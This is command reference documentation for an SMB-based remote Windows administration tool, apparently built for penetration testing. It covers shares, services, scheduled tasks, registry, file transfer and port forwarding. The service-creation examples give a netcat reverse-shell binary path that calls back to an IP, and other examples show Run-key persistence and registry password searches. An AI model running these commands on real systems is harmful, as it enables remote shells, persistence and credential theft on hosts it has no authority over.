CLI Commands Documentation
April 13, 2026
use
Description: Connect to a specific share on the remote server
Help:
usage: use [-h] share
Connect to a specific share on the remote server
Example Usage:
Example Usage: use <sharename> | use C$
Arguments
- share: Specify the share name to connect to
  - Required: Yes
ls
Description: List contents of a directory at a specified path. File paths with spaces must be entirely in quotes.
Help:
usage: ls [-h] [-s {name,size,created,lastaccess,lastwrite}] [--sort-reverse]
[-l] [-r depth] [-o filename] [--show] [--type {f,d,a}]
[path]
List contents of a directory at a specified path. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: ls /path/to/directory
ls --type f -l # List only files in long format
ls --type d # List only directories
ls --type f -r 2 # Recursively list only files to depth 2
Arguments
- path: Path to list contents, defaults to current path
  - Default: .
  - Required: No
- sort: Sort the directory contents by name, size, or date
  - Choices: name, size, created, lastaccess, lastwrite
  - Default: date
  - Required: No
- recursive: Recursively list directory contents with X depth
  - Required: No
- output: Save output to file
  - Required: No
- type: Filter by type: f=files only, d=directories only, a=all
  - Choices: f, d, a
  - Default: a
  - Required: No
find
Description: Search for files and directories across the remote share with advanced filtering options.
Help:
usage: find [-h] [--path PATH] [--type {f,d,a}] [--size SIZE] [--mtime MTIME]
[--ctime CTIME] [--atime ATIME] [--regex] [--iname]
[--maxdepth MAXDEPTH] [--mindepth MINDEPTH] [--limit LIMIT]
[--sort {name,size,mtime,ctime,atime}] [--reverse]
[--format {table,list,paths,json}] [-o OUTPUT] [--empty]
[--hidden] [--progress] [--timeout TIMEOUT]
pattern
Search for files and directories across the remote share with advanced filtering options.
Example Usage:
Example Usage: find "*.txt" --path /Users --type f --size +1MB
Arguments
- pattern: Search pattern (supports wildcards like *.txt or regex with --regex flag)
  - Required: Yes
- path: Starting search path (default: current directory)
  - Default: .
  - Required: No
- type: Search type: f=files only, d=directories only, a=all
  - Choices: f, d, a
  - Default: a
  - Required: No
- size: File size filter: +1MB (larger than), -100KB (smaller than), =5GB (exactly)
  - Required: No
- mtime: Modified within N days (positive number)
  - Required: No
- ctime: Created within N days (positive number)
  - Required: No
- atime: Accessed within N days (positive number)
  - Required: No
- maxdepth: Maximum search depth
  - Default: 2
  - Required: No
- mindepth: Minimum search depth
  - Default: 0
  - Required: No
- limit: Maximum number of results to return
  - Required: No
- sort: Sort results by field
  - Choices: name, size, mtime, ctime, atime
  - Default: name
  - Required: No
- format: Output format
  - Choices: table, list, paths, json
  - Default: table
  - Required: No
- output: Save results to file
  - Required: No
- timeout: Search timeout in seconds
  - Default: 120
  - Required: No
shares
Description: List all shares available on the remote server
Help:
usage: shares [-h] [-l]
List all shares available on the remote server
Example Usage:
Example Usage: shares
enumshares
Description: List all shares available on the remote server
Help:
usage: shares [-h] [-l]
List all shares available on the remote server
Example Usage:
Example Usage: shares
enumpipes
Description: Enumerate named pipes on the remote server via IPC$ share and RPC endpoints. Preserves current share connection by default.
Help:
usage: enumpipes [-h] [--detailed] [--method {smb,rpc,hybrid}]
[--output filename]
Enumerate named pipes on the remote server via IPC$ share and RPC endpoints. Preserves current share connection by default.
Example Usage:
Example Usage: enumpipes --detailed --output pipes.txt
Arguments
- method: Enumeration method to use
  - Choices: smb, rpc, hybrid
  - Default: hybrid
  - Required: No
- output: Save output to specified file
  - Required: No
cat
Description: Display the contents of a specified file on the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: cat [-h] remote_path
Display the contents of a specified file on the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: cat /path/to/file
Arguments
- remote_path: Specify the remote file path to display contents
  - Required: Yes
cd
Description: Change to a different directory on the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: cd [-h] [path]
Change to a different directory on the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: cd /path/to/directory
Arguments
- path: Directory path to change to, defaults to current directory
  - Default: .
  - Required: No
pwd
Description: Print the current working directory on the remote server
Help:
usage: pwd [-h]
Print the current working directory on the remote server
Example Usage:
Example Usage: pwd
exit
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
quit
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
logout
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
logoff
Description: Exit the application
Help:
usage: exit [-h]
Exit the application
Example Usage:
Example Usage: exit
clear
Description: Clear the screen
Help:
usage: clear [-h]
Clear the screen
Example Usage:
Example Usage: clear
help
Description: Display help information for the application
Help:
usage: help [-h] [--verbose] [cmd]
Display help information for the application
Example Usage:
Example Usage: help
Arguments
- cmd: Specify a command to show help for
  - Required: No
reconnect
Description: Reconnect to the server to fix broken pipe or connection errors
Help:
usage: reconnect [-h]
Reconnect to the server to fix broken pipe or connection errors
Example Usage:
Use this command when you encounter '[Errno 32] Broken pipe' errors
who
Description: List the current sessions connected to the target host
Help:
usage: who [-h]
List the current sessions connected to the target host
Example Usage:
Example Usage: who
enumdisk
Description: Enumerate server disk information
Help:
usage: enumdisk [-h]
Enumerate server disk information
Example Usage:
Example Usage: enumdisk
enumlogons
Description: Enumerate users currently logged on the server
Help:
usage: enumlogons [-h]
Enumerate users currently logged on the server
Example Usage:
Example Usage: enumlogons
enuminfo
Description: Enumerate detailed information about the remote host
Help:
usage: enuminfo [-h]
Enumerate detailed information about the remote host
Example Usage:
Example Usage: enuminfo
enumsys
Description: Enumerate system information of the remote host
Help:
usage: enumsys [-h]
Enumerate system information of the remote host
Example Usage:
Example Usage: enumsys
enumtransport
Description: Enumerate transport information of the remote host
Help:
usage: enumtransport [-h]
Enumerate transport information of the remote host
Example Usage:
Example Usage: enumtransport
enumservices
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
- filter: Filter services by name or state
  - Required: No
servicesenum
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
- filter: Filter services by name or state
  - Required: No
svcenum
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
- filter: Filter services by name or state
  - Required: No
services
Description: Enumerate services on the remote host
Help:
usage: enumservices [-h] [-n] [--filter FILTER]
Enumerate services on the remote host
Example Usage:
Example Usage: enumservices --filter name=spooler OR enumservices --filter state=running OR enumservices -n
Arguments
- filter: Filter services by name or state
  - Required: No
serviceshow
Description: Show details of a specific service on the remote server
Help:
usage: serviceshow [-h] (-i SERVICEID | service_name)
Show details of a specific service on the remote server
Example Usage:
Example Usage: serviceshow -i 123
Arguments
- serviceid: Specify the ID of the service to show details for
  - Required: No
- service_name: Specify the name of the service to show
  - Required: No
svcshow
Description: Show details of a specific service on the remote server
Help:
usage: serviceshow [-h] (-i SERVICEID | service_name)
Show details of a specific service on the remote server
Example Usage:
Example Usage: serviceshow -i 123
Arguments
- serviceid: Specify the ID of the service to show details for
  - Required: No
- service_name: Specify the name of the service to show
  - Required: No
showservice
Description: Show details of a specific service on the remote server
Help:
usage: serviceshow [-h] (-i SERVICEID | service_name)
Show details of a specific service on the remote server
Example Usage:
Example Usage: serviceshow -i 123
Arguments
- serviceid: Specify the ID of the service to show details for
  - Required: No
- service_name: Specify the name of the service to show
  - Required: No
servicestart
Description: Start a specified service on the remote server
Help:
usage: servicestart [-h] (-i SERVICEID | service_name)
Start a specified service on the remote server
Example Usage:
Example Usage: servicestart -i 123 OR svcstart Spooler
Arguments
- serviceid: Specify the ID of the service to start
  - Required: No
- service_name: Specify the name of the service to start
  - Required: No
svcstart
Description: Start a specified service on the remote server
Help:
usage: servicestart [-h] (-i SERVICEID | service_name)
Start a specified service on the remote server
Example Usage:
Example Usage: servicestart -i 123 OR svcstart Spooler
Arguments
- serviceid: Specify the ID of the service to start
  - Required: No
- service_name: Specify the name of the service to start
  - Required: No
servicerun
Description: Start a specified service on the remote server
Help:
usage: servicestart [-h] (-i SERVICEID | service_name)
Start a specified service on the remote server
Example Usage:
Example Usage: servicestart -i 123 OR svcstart Spooler
Arguments
- serviceid: Specify the ID of the service to start
  - Required: No
- service_name: Specify the name of the service to start
  - Required: No
servicestop
Description: Stop a specified service on the remote server
Help:
usage: servicestop [-h] (-i SERVICEID | service_name)
Stop a specified service on the remote server
Example Usage:
Example Usage: servicestop -i 123 OR svcstop Spooler
Arguments
- serviceid: Specify the ID of the service to stop
  - Required: No
- service_name: Specify the name of the service to stop
  - Required: No
svcstop
Description: Stop a specified service on the remote server
Help:
usage: servicestop [-h] (-i SERVICEID | service_name)
Stop a specified service on the remote server
Example Usage:
Example Usage: servicestop -i 123 OR svcstop Spooler
Arguments
- serviceid: Specify the ID of the service to stop
  - Required: No
- service_name: Specify the name of the service to stop
  - Required: No
serviceenable
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
- serviceid: Specify the ID of the service to enable
  - Required: No
- service_name: Specify the name of the service to enable
  - Required: No
svcenable
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
- serviceid: Specify the ID of the service to enable
  - Required: No
- service_name: Specify the name of the service to enable
  - Required: No
enableservice
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
- serviceid: Specify the ID of the service to enable
  - Required: No
- service_name: Specify the name of the service to enable
  - Required: No
enablesvc
Description: Enable a specified service on the remote server
Help:
usage: serviceenable [-h] (-i SERVICEID | service_name)
Enable a specified service on the remote server
Example Usage:
Example Usage: serviceenable -i 123 OR svcenable Spooler
Arguments
- serviceid: Specify the ID of the service to enable
  - Required: No
- service_name: Specify the name of the service to enable
  - Required: No
servicedisable
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
- serviceid: Specify the ID of the service to disable
  - Required: No
- service_name: Specify the name of the service to disable
  - Required: No
svcdisable
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
- serviceid: Specify the ID of the service to disable
  - Required: No
- service_name: Specify the name of the service to disable
  - Required: No
disableservice
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
- serviceid: Specify the ID of the service to disable
  - Required: No
- service_name: Specify the name of the service to disable
  - Required: No
disablesvc
Description: Disable a specified service on the remote server
Help:
usage: servicedisable [-h] (-i SERVICEID | service_name)
Disable a specified service on the remote server
Example Usage:
Example Usage: servicedisable -i 123 OR svcdisable Spooler
Arguments
- serviceid: Specify the ID of the service to disable
  - Required: No
- service_name: Specify the name of the service to disable
  - Required: No
servicedel
Description: Delete a specified service on the remote server
Help:
usage: servicedel [-h] (-i SERVICEID | service_name)
Delete a specified service on the remote server
Example Usage:
Example Usage: servicedelete -i 123 OR svcdelete Spooler
Arguments
- serviceid: Specify the ID of the service to delete
  - Required: No
- service_name: Specify the name of the service to delete
  - Required: No
svcdelete
Description: Delete a specified service on the remote server
Help:
usage: servicedel [-h] (-i SERVICEID | service_name)
Delete a specified service on the remote server
Example Usage:
Example Usage: servicedelete -i 123 OR svcdelete Spooler
Arguments
- serviceid: Specify the ID of the service to delete
  - Required: No
- service_name: Specify the name of the service to delete
  - Required: No
servicedelete
Description: Delete a specified service on the remote server
Help:
usage: servicedel [-h] (-i SERVICEID | service_name)
Delete a specified service on the remote server
Example Usage:
Example Usage: servicedelete -i 123 OR svcdelete Spooler
Arguments
- serviceid: Specify the ID of the service to delete
  - Required: No
- service_name: Specify the name of the service to delete
  - Required: No
serviceadd
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
- name: Specify the name of the new service
  - Required: Yes
- binary_path: Specify the binary path of the new service
  - Required: Yes
- display_name: Specify the display name of the new service
  - Required: Yes
- start_type: Specify the start type of the new service
  - Choices: auto, demand, system
  - Default: demand
  - Required: Yes
svcadd
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
- name: Specify the name of the new service
  - Required: Yes
- binary_path: Specify the binary path of the new service
  - Required: Yes
- display_name: Specify the display name of the new service
  - Required: Yes
- start_type: Specify the start type of the new service
  - Choices: auto, demand, system
  - Default: demand
  - Required: Yes
servicecreate
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
- name: Specify the name of the new service
  - Required: Yes
- binary_path: Specify the binary path of the new service
  - Required: Yes
- display_name: Specify the display name of the new service
  - Required: Yes
- start_type: Specify the start type of the new service
  - Choices: auto, demand, system
  - Default: demand
  - Required: Yes
svccreate
Description: Create a new service on the remote server
Help:
usage: serviceadd [-h] -n NAME -b BINARY_PATH -d DISPLAY_NAME
-s {auto,demand,system}
Create a new service on the remote server
Example Usage:
Example Usage: -b "C:\nc.exe 10.0.0.26 8080 -e cmd.exe"
Arguments
- name: Specify the name of the new service
  - Required: Yes
- binary_path: Specify the binary path of the new service
  - Required: Yes
- display_name: Specify the display name of the new service
  - Required: Yes
- start_type: Specify the start type of the new service
  - Choices: auto, demand, system
  - Default: demand
  - Required: Yes
servicemodify
Description: Modify service binary path, display name, start type, or account
Help:
usage: servicemodify [-h] [--binary-path BINARY_PATH]
[--display-name DISPLAY_NAME]
[--start-type {auto,demand,disabled,system}]
[--account ACCOUNT] [--password PASSWORD]
[-i SERVICEID | service_name]
Modify service binary path, display name, start type, or account
Example Usage:
Examples:
servicemodify Spooler --start-type demand
servicemodify Spooler --binary-path "C:\\new\\path.exe" --display-name "New Name"
servicemodify -i 5 --account "NT AUTHORITY\\LocalService"
Arguments
- serviceid: Specify the service ID
  - Required: No
- service_name: Specify the service name
  - Required: No
- binary_path: New binary path for the service
  - Required: No
- display_name: New display name for the service
  - Required: No
- start_type: New start type for the service
  - Choices: auto, demand, disabled, system
  - Required: No
- account: Account the service runs as on startup (e.g., LocalSystem, NT AUTHORITY\NetworkService, DOMAIN\user)
  - Required: No
- password: Password for --account (required for domain/local users, not needed for built-in accounts like LocalSystem)
  - Required: No
svcmodify
Description: Modify service binary path, display name, start type, or account
Help:
usage: servicemodify [-h] [--binary-path BINARY_PATH]
[--display-name DISPLAY_NAME]
[--start-type {auto,demand,disabled,system}]
[--account ACCOUNT] [--password PASSWORD]
[-i SERVICEID | service_name]
Modify service binary path, display name, start type, or account
Example Usage:
Examples:
servicemodify Spooler --start-type demand
servicemodify Spooler --binary-path "C:\\new\\path.exe" --display-name "New Name"
servicemodify -i 5 --account "NT AUTHORITY\\LocalService"
Arguments
- serviceid: Specify the service ID
  - Required: No
- service_name: Specify the service name
  - Required: No
- binary_path: New binary path for the service
  - Required: No
- display_name: New display name for the service
  - Required: No
- start_type: New start type for the service
  - Choices: auto, demand, disabled, system
  - Required: No
- account: Account the service runs as on startup (e.g., LocalSystem, NT AUTHORITY\NetworkService, DOMAIN\user)
  - Required: No
- password: Password for --account (required for domain/local users, not needed for built-in accounts like LocalSystem)
  - Required: No
modifyservice
Description: Modify service binary path, display name, start type, or account
Help:
usage: servicemodify [-h] [--binary-path BINARY_PATH]
[--display-name DISPLAY_NAME]
[--start-type {auto,demand,disabled,system}]
[--account ACCOUNT] [--password PASSWORD]
[-i SERVICEID | service_name]
Modify service binary path, display name, start type, or account
Example Usage:
Examples:
servicemodify Spooler --start-type demand
servicemodify Spooler --binary-path "C:\\new\\path.exe" --display-name "New Name"
servicemodify -i 5 --account "NT AUTHORITY\\LocalService"
Arguments
- serviceid: Specify the service ID
  - Required: No
- service_name: Specify the service name
  - Required: No
- binary_path: New binary path for the service
  - Required: No
- display_name: New display name for the service
  - Required: No
- start_type: New start type for the service
  - Choices: auto, demand, disabled, system
  - Required: No
- account: Account the service runs as on startup (e.g., LocalSystem, NT AUTHORITY\NetworkService, DOMAIN\user)
  - Required: No
- password: Password for --account (required for domain/local users, not needed for built-in accounts like LocalSystem)
  - Required: No
enumtasks
Description: Enumerate scheduled tasks on the remote server
Help:
usage: enumtasks [-h] [-n] [--filter FILTER]
Enumerate scheduled tasks on the remote server
Example Usage:
Example Usage: enumtasks --filter name=Microsoft OR enumtasks --filter folder=Windows OR enumtasks -n
Arguments
- filter: Filter tasks by name or folder
  - Required: No
tasksenum
Description: Enumerate scheduled tasks on the remote server
Help:
usage: enumtasks [-h] [-n] [--filter FILTER]
Enumerate scheduled tasks on the remote server
Example Usage:
Example Usage: enumtasks --filter name=Microsoft OR enumtasks --filter folder=Windows OR enumtasks -n
Arguments
- filter: Filter tasks by name or folder
  - Required: No
taskenum
Description: Enumerate scheduled tasks on the remote server
Help:
usage: enumtasks [-h] [-n] [--filter FILTER]
Enumerate scheduled tasks on the remote server
Example Usage:
Example Usage: enumtasks --filter name=Microsoft OR enumtasks --filter folder=Windows OR enumtasks -n
Arguments
- filter: Filter tasks by name or folder
  - Required: No
taskshow
Description: Show details of a specific task on the remote server
Help:
usage: taskshow [-h] (-i TASK_ID | task_path)
Show details of a specific task on the remote server
Example Usage:
Example Usage: tasksshow -i 123
Arguments
- task_id: Specify the ID of the task to show
  - Required: No
- task_path: Specify the full path of the task to show
  - Required: No
tasksshow
Description: Show details of a specific task on the remote server
Help:
usage: taskshow [-h] (-i TASK_ID | task_path)
Show details of a specific task on the remote server
Example Usage:
Example Usage: tasksshow -i 123
Arguments
- task_id: Specify the ID of the task to show
  - Required: No
- task_path: Specify the full path of the task to show
  - Required: No
showtask
Description: Show details of a specific task on the remote server
Help:
usage: taskshow [-h] (-i TASK_ID | task_path)
Show details of a specific task on the remote server
Example Usage:
Example Usage: tasksshow -i 123
Arguments
- task_id: Specify the ID of the task to show
  - Required: No
- task_path: Specify the full path of the task to show
  - Required: No
taskcreate
Description: Create a new scheduled task on the remote server
Help:
usage: taskcreate [-h] -n NAME -p PROGRAM [-a ARGUMENTS] [-f FOLDER]
[-i INTERVAL] [-d DATE]
Create a new scheduled task on the remote server
Example Usage:
Example Usage: taskcreate -n newtask -p cmd.exe -a '/c ipconfig /all > C:\test' -f \\Windows
Arguments
- name: Specify the name of the new task
  - Required: Yes
- program: Specify the program to run (cmd.exe)
  - Required: Yes
- arguments: Specify the arguments to pass to the program
  - Required: No
- folder: Specify the folder to create the task in
  - Default: ``
  - Required: No
- interval: Specify an interval in minutes to run the task
  - Required: No
- date: Specify the date to start the task (2099-12-31 14:01:00)
  - Required: No
taskadd
Description: Create a new scheduled task on the remote server
Help:
usage: taskcreate [-h] -n NAME -p PROGRAM [-a ARGUMENTS] [-f FOLDER]
[-i INTERVAL] [-d DATE]
Create a new scheduled task on the remote server
Example Usage:
Example Usage: taskcreate -n newtask -p cmd.exe -a '/c ipconfig /all > C:\test' -f \\Windows
Arguments
- name: Specify the name of the new task
  - Required: Yes
- program: Specify the program to run (cmd.exe)
  - Required: Yes
- arguments: Specify the arguments to pass to the program
  - Required: No
- folder: Specify the folder to create the task in
  - Default: ``
  - Required: No
- interval: Specify an interval in minutes to run the task
  - Required: No
- date: Specify the date to start the task (2099-12-31 14:01:00)
  - Required: No
taskimport
Description: Import a scheduled task from a local XML definition file
Help:
usage: taskimport [-h] -f FILE [-n NAME] [-d FOLDER] [--test] [--force]
Import a scheduled task from a local XML definition file
Example Usage:
Example Usage: taskimport -f task.xml --test | taskimport -f task.xml -n MyTask -d \\MyFolder
Arguments
- file: Path to local XML task definition file
  - Required: Yes
- name: Task name (extracted from XML URI if omitted)
  - Required: No
- folder: Task Scheduler folder (default: root)
  - Default: ``
  - Required: No
taskrun
Description: Run a specified task on the remote server
Help:
usage: taskrun [-h] task_path
Run a specified task on the remote server
Example Usage:
Example Usage: taskrun \\Windows\\newtask
Arguments
- task_path: Specify the full path of the task to run
  - Required: Yes
taskexec
Description: Run a specified task on the remote server
Help:
usage: taskrun [-h] task_path
Run a specified task on the remote server
Example Usage:
Example Usage: taskrun \\Windows\\newtask
Arguments
- task_path: Specify the full path of the task to run
  - Required: Yes
taskdelete
Description: Delete a specified task on the remote server
Help:
usage: taskdelete [-h] (-i TASK_ID | task_path)
Delete a specified task on the remote server
Example Usage:
Example Usage: taskdelete -i 123
Arguments
- task_path: Specify the full path of the task to delete
  - Required: No
- task_id: Specify the ID of the task to delete
  - Required: No
taskdel
Description: Delete a specified task on the remote server
Help:
usage: taskdelete [-h] (-i TASK_ID | task_path)
Delete a specified task on the remote server
Example Usage:
Example Usage: taskdelete -i 123
Arguments
- task_path: Specify the full path of the task to delete
  - Required: No
- task_id: Specify the ID of the task to delete
  - Required: No
taskrm
Description: Delete a specified task on the remote server
Help:
usage: taskdelete [-h] (-i TASK_ID | task_path)
Delete a specified task on the remote server
Example Usage:
Example Usage: taskdelete -i 123
Arguments
- task_path: Specify the full path of the task to delete
  - Required: No
- task_id: Specify the ID of the task to delete
  - Required: No
time
Description: Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Help:
usage: time [-h]
Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Example Usage:
Example Usage: time
enumtime
Description: Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Help:
usage: time [-h]
Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Example Usage:
Example Usage: time
servertime
Description: Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Help:
usage: time [-h]
Get the current time, date, timezone, and uptime from the remote server via NetrRemoteTOD RPC call
Example Usage:
Example Usage: time
upload
Description: Upload a file to the remote server
Help:
usage: upload [-h] local_path [remote_path]
Upload a file to the remote server
Example Usage:
Example Usage: upload /local/path /remote/path
Arguments
- local_path: Specify the local file path to upload
  - Required: Yes
- remote_path: Specify the remote file path to upload to, optional
  - Required: No
put
Description: Upload a file to the remote server
Help:
usage: upload [-h] local_path [remote_path]
Upload a file to the remote server
Example Usage:
Example Usage: upload /local/path /remote/path
Arguments
- local_path: Specify the local file path to upload
  - Required: Yes
- remote_path: Specify the remote file path to upload to, optional
  - Required: No
download
Description: Download a file from the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: download [-h] [--resume] [--restart] [--chunk-size CHUNK_SIZE]
remote_path [local_path]
Download a file from the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: download /remote/path/to/file.txt /local/path/to/save/file.txt
Arguments
- remote_path: Specify the remote file path to download
  - Required: Yes
- local_path: Specify the local file path to download to, optional
  - Required: No
- chunk_size: Chunk size for download (e.g., 64k, 1M, 512k)
  - Default: 64k
  - Required: No
get
Description: Download a file from the remote server. File paths with spaces must be entirely in quotes.
Help:
usage: download [-h] [--resume] [--restart] [--chunk-size CHUNK_SIZE]
remote_path [local_path]
Download a file from the remote server. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: download /remote/path/to/file.txt /local/path/to/save/file.txt
Arguments
- remote_path: Specify the remote file path to download
  - Required: Yes
- local_path: Specify the local file path to download to, optional
  - Required: No
- chunk_size: Chunk size for download (e.g., 64k, 1M, 512k)
  - Default: 64k
  - Required: No
mget
Description: Download all files from a specified directory and its subdirectories. File paths with spaces must be entirely in quotes.
Help:
usage: mget [-h] [-r] [-p regex] [-d D] [remote_path] [local_path]
Download all files from a specified directory and its subdirectories. File paths with spaces must be entirely in quotes.
Example Usage:
Example Usage: mget /remote/path /local/path
Arguments
- remote_path: Specify the remote directory path to download from
  - Required: No
- local_path: Specify the local directory path where files will be downloaded
  - Required: No
- p: Specify a regex pattern to match filenames
  - Required: No
- d: Specify folder depth count for recursion
  - Default: 2
  - Required: No
mkdir
Description: Create a new directory on the remote server
Help:
usage: mkdir [-h] path
Create a new directory on the remote server
Example Usage:
Example Usage: mkdir /path/to/new/directory
Arguments
- path: Specify the path of the directory to create
  - Required: Yes
rmdir
Description: Remove a directory on the remote server
Help:
usage: rmdir [-h] remote_path
Remove a directory on the remote server
Example Usage:
Example Usage: rmdir /path/to/remote/directory
Arguments
- remote_path: Specify the remote path of the directory to remove
  - Required: Yes
rm
Description: Delete one or more files on the remote server
Help:
usage: rm [-h] [-n FILE_LIST] [remote_path]
Delete one or more files on the remote server
Example Usage:
Example Usage: rm file.txt, rm -n 'file1.txt file2.txt file3.txt'
Arguments
- remote_path: Specify the remote file path to delete
  - Required: No
- file_list: Space-separated list of files to delete (quoted)
  - Required: No
#shell
Description: Enter local terminal mode for command execution
Help:
usage: #shell [-h]
Enter local terminal mode for command execution
Example Usage:
Example Usage: #shell
!
Description: Run a specified local command
Help:
usage: ! [-h] ...
Run a specified local command
Example Usage:
Example Usage: ! ls -l
Arguments
- commands: Specify the local commands to run
  - Required: No
info
Description: Display the status of the current session
Help:
usage: info [-h]
Display the status of the current session
Example Usage:
Example Usage: info
history
Description: Display recent command history from the slinger history file
Help:
usage: history [-h] [-n NUM] [--search TERM]
Display recent command history from the slinger history file
Example Usage:
Examples:
history # Show last 15 commands
history -n 50 # Show last 50 commands
history --search whoami # Search history for 'whoami'
history --search atexec -n 100 # Search last 100 entries for 'atexec'
!42 # Re-run command #42 from history
Tip: Press Ctrl+R for interactive reverse search while typing
Arguments
- n: Number of history lines to display (default: 15)
  - Default: 15
  - Required: No
- search: Search history for commands matching TERM
  - Required: No
reguse
Description: Connect to a remote registry on the remote server
Help:
usage: reguse [-h]
Connect to a remote registry on the remote server
Example Usage:
Example Usage: reguse
regstart
Description: Connect to a remote registry on the remote server
Help:
usage: reguse [-h]
Connect to a remote registry on the remote server
Example Usage:
Example Usage: reguse
regstop
Description: Disconnect from a remote registry on the remote server
Help:
usage: regstop [-h]
Disconnect from a remote registry on the remote server
Example Usage:
Example Usage: regstop
regquery
Description: Query a registry key on the remote server
Help:
usage: regquery [-h] [-l] [-v] key
Query a registry key on the remote server
Example Usage:
Example Usage: regquery HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run (You must use two slashes or quotes)
Arguments
- key: Specify the registry key to query
  - Required: Yes
regset
Description: Set a registry value on the remote server
Help:
usage: regset [-h] -k KEY -v VALUE -d DATA [-t TYPE]
Set a registry value on the remote server
Example Usage:
Example Usage: regset -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v test -d "C:\test.exe"
Arguments
- key: Specify the registry key to set
  - Required: Yes
- value: Specify the registry value to set
  - Required: Yes
- data: Specify the registry data to set
  - Required: Yes
- type: Specify the registry type to set
  - Default: REG_SZ
  - Required: No
regdel
Description: Delete a registry value on the remote server
Help:
usage: regdel [-h] -k KEY [-v VALUE]
Delete a registry value on the remote server
Example Usage:
Example Usage: regdel -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ -v test
Arguments
- key: Specify the registry key to delete
  - Required: Yes
- value: Specify the registry value to delete
  - Required: No
regcreate
Description: Create a registry key on the remote server
Help:
usage: regcreate [-h] key
Create a registry key on the remote server
Example Usage:
Example Usage: regcreate -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\test
Arguments
- key: Specify the registry key to create
  - Required: Yes
regcheck
Description: Check if a registry key exists on the remote server. This is really just an exposed helper function.
Help:
usage: regcheck [-h] key
Check if a registry key exists on the remote server. This is really just an exposed helper function.
Example Usage:
Example Usage: regcheck HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\test
Arguments
- key: Specify the registry key to check
  - Required: Yes
regsearch
Description: Recursively search registry for keys and values matching a pattern
Help:
usage: regsearch [-h] [-k KEY] [--maxdepth MAXDEPTH] [--values]
[--limit LIMIT] [--format {table,json}]
pattern
Recursively search registry for keys and values matching a pattern
Example Usage:
Examples:
regsearch "Python" -k "HKLM\SOFTWARE"
regsearch "Spooler" -k "HKLM\SYSTEM\CurrentControlSet\Services" --values
regsearch "Run" -k "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion" --maxdepth 3
regsearch "password" -k "HKLM\SOFTWARE" --values --format json
Arguments
- pattern: Search pattern (case-insensitive substring match)
  - Required: Yes
- key: Root key to search from
  - Default: HKLM\SOFTWARE
  - Required: No
- maxdepth: Maximum recursion depth
  - Default: 5
  - Required: No
- limit: Maximum results to return
  - Default: 100
  - Required: No
- format: Output format
  - Choices: table, json
  - Default: table
  - Required: No
portfwd
Description: Forward a local port to a remote port on the remote server
Help:
usage: portfwd [-h] (-d | -a | -l | -c | --load) local remote
Forward a local port to a remote port on the remote server
Example Usage:
Example Usage: portfwd (-a|-d) [lhost]:[lport] [rhost]:[rport]
Arguments
- local: Specify the local host and port to forward from
  - Required: Yes
